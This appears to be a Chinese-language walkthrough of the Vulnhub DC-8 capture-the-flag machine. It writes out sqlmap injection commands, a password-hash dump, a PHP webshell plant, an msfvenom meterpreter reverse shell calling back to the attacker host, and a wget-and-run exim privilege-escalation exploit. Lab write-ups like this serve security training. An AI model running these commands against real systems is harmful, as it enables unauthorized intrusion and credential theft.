[Vulnhub] DC-8
创始人
2024-05-21 01:33:16
0

下载链接:https://download.vulnhub.com/dc/DC-8.zip

知识点:

  • sqlmap 注入出用户名密码
  • msfvenom 生成脚本+msf反弹shell
  • suid-exim 提权

目录

<1> 信息搜集

<2> 反弹shell

(1) 利用kali自带webshell代码

(2) msfvenom制作反弹shell脚本

<3> Privilege Escalation(suid-exim提权)


<1> 信息搜集

扫一下靶机的ip

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.138

nmap -A -p 1-65535 192.168.236.138 扫描一下靶机开放哪些服务

开放了22端口的 ssh服务和80 http服务

 url栏中有一个?nid=1  改变为2 就是Who We Are 可能存在sql注入漏洞 加上 ' 验证一下

 出现sql报错语句,存在整形注入 1 and 1=1 正常 1 and 1=2报错

上sqlmap,  爆一下数据库

sqlmap -u "http://192.168.236.138/?nid=1" --batch --dbs

 得到数据库 d7db, 然后爆一下表名

sqlmap -u "http://192.168.236.138/?nid=1" --batch -D d7db --tables   

 sqlmap -u "http://192.168.236.138/?nid=1" --batch -D d7db -T users --columns 

爆一下字段

 sqlmap -u "http://192.168.236.138/?nid=1" --batch -D d7db -T users -C "name,pass" --dump

得到name和pass:

| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |

把两个密文写入txt,然后john爆破一下,只爆出来一个turtle

回到登录界面 /user/login

成功登录 john    但是ssh连接不了

 

<2> 反弹shell

(1) 利用kali自带webshell代码

 在webform里的 Form settings 发现可以编辑执行php代码

往contact us里写入webshell(kali里有 前面文章也发过)

注:不能只有php代码,前面还有有一段html 比如:

Success

否则php代码不执行

 之后回到contact us那里 submit

转为交互式

python -c 'import pty;pty.spawn("/bin/bash")'

(2) msfvenom制作反弹shell脚本

 使用msfvenom制作反弹shell脚本

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.236.128 lport=4444 R >shell.txt

把生成的php代码复制到 contact us_settings那里

kali设置msf选项 use multi/handler,进行监听kali的4444端口

run 开启监听后,submit 之前生成的shell脚本执行之后   shell 然后python转为交互式:

<3> Privilege Escalation(suid-exim提权)

查看具有SUID的二进制可执行文件

find / -user root -perm -4000 -print 2>/dev/null

发现exim4命令   --version 得到版本为 exim4 4.89

 searchsploit exim

发现可利用的提权脚本  46996.sh

searchsploit -m 46996.sh 下载下来。

python -m http.server 1234  开启一个http服务

然后回到靶机的shell里

cd /tmp
wget http://192.168.236.128:1234/46996.sh
chmod 777 46996.sh
./46996.sh -m netcat

 拿到flag

 

 

相关内容

热门资讯

国庆长假祝福语 国庆长假祝福语(精选15篇)  在日常学习、工作或生活中,大家总免不了要接触或使用祝福语吧,祝福语能...
3.8妇女节祝福语 3.8妇女节祝福语21句  孩子是妈妈的宝,儿女总嫌娘唠叨,养儿方知父母恩,母亲床前来尽孝,满头白发...
结婚撒帐祝福语大全   篇一:结婚闹洞房-撒帐  张灯结彩贺新郎,鞭炮齐鸣迎新娘。男女老少同聚会,亲友请我撒喜床。 我嘴...
父亲节祝福语 父亲节祝福语(精选265句)  在平平淡淡的日常中,大家都尝试过写祝福语吧,祝福语是人们表达心中祝福...
妇女节祝福语 妇女节祝福语精选15篇  在平时的学习、工作或生活中,大家都有写祝福语的经历,对祝福语很是熟悉吧,祝...
新年贺词 新年贺词(通用5篇)  新年贺词是我们新春佳节时对自己的亲朋好友的美好祝福。以下是小编收集整理的新年...
企业祝福语 企业祝福语5篇  在平日的学习、工作和生活里,大家都用到过祝福语吧,祝福语不限制字数,在运用上较为灵...
中秋快乐的简短祝福语 中秋快乐的简短祝福语(精选135句)  海上升明月,天涯共此时,又是一个花好月圆夜,送你一个月饼,无...
祝愿高考成功的祝福语 祝愿高考成功的祝福语  1、人生要经历许许多多的考试,上学时候,大考小考、周考月考等层出不穷,走上社...
表达元宵节快乐的祝福语短信 2020年表达元宵节快乐的祝福语短信大集合45条  田园诗画生明月,正月十五元宵节。歌舞升平放烟花,...
七夕给女朋友的浪漫祝福语 七夕给女朋友的浪漫祝福语  自从爱上你,心就放不下你,走路牵着你,累了背着你,天冷揣着你,天热顶着你...
祝福的简短话语 祝福的简短话语(精选230句)  无论是身处学校还是步入社会,大家都经常接触到话语吧,话语是说出来的...
朋友生日祝福语短信 朋友生日祝福语短信大全  在学习、工作、生活中,许多人都有过编辑短信的经历,对短信都不陌生吧,短信有...
生意兴隆祝福语 生意兴隆祝福语  在日常生活或是工作学习中,大家总少不了要接触或使用祝福语吧,祝福语可以起到增进感情...
考入大学祝福语八个字 考入大学祝福语八个字  在学习、工作或生活中,说到祝福语,大家肯定都不陌生吧,祝福语是人们表达心中祝...
教师节祝福老师的话 教师节祝福老师的话  在此教师节来临的时候,给培育自己的老师献上一份祝福,接下来是unjs小编为大家...
优美的腊八节祝福语短信 优美的腊八节祝福语短信集合50句  有句话一直没敢对你说,可是新年再不说就没机会了:你真地好讨厌讨人...
母亲节幼儿园活动祝福语 母亲节幼儿园活动祝福语(精选100句)  在我们平凡的日常里,大家都经常接触到祝福语吧,祝福语能给亲...
满月酒贺词 满月酒贺词  在学习、工作或生活中,大家都用到过贺词吧,贺词是对既成结果的庆祝、贺喜、赞美。那么问题...
五一劳动节祝福语短信 2020年五一劳动节祝福语短信汇编49句  让繁忙所有竣事,让辛勤赶忙止步,让快乐心中停驻,让好运随...